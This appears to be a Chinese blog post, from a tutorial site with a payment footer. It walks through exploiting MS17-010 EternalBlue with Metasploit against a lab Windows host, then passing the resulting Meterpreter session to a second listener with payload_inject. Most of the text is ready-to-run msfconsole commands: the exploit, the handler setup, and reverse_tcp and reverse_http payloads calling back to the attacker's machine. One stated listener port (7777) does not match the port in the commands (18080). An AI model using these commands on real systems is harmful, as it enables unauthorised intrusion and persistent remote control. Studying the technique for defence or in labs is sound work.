MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit

利用永恒之蓝漏洞进行Meterpreter会话迁移
本文详细描述了如何通过MSF(MetasploitFramework)利用EternalBlue漏洞在Windows系统间执行Meterpreter会话迁移,包括使用reverse_tcp和reverse_http协议的示例。

首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ip

set autorunscript post/windows/manage/migrate name=services.exe
set payload windows/x64/meterpreter/reverse_tcp
set lport 5577
set lhost 192.168.50.130
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.50.146
set rport 445
exploit -j -z

接下来在另外的msf里,做好监听3333:

handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp

然后在上面的meterpreter 里:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.130
set lport 3333
set DisablePayloadHandler True
set PrependMigrate True
set session 1   
run

这样就可以退出使用ms17_010拿下的session了

如上使用的是reverse_tcp,其实reverse_http,也是一样的可以:

在另外的msf里,做好监听7777:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set ExitOnSession false
set SessionExpirationTimeout 0 
set SessionCommunicationTimeout 0 
exploit -j -z

然后在旧session里派生:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set DisablePayloadHandler True
set PrependMigrate True
set session 1
run

run后大概需要15-20秒才能完全建立新session.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值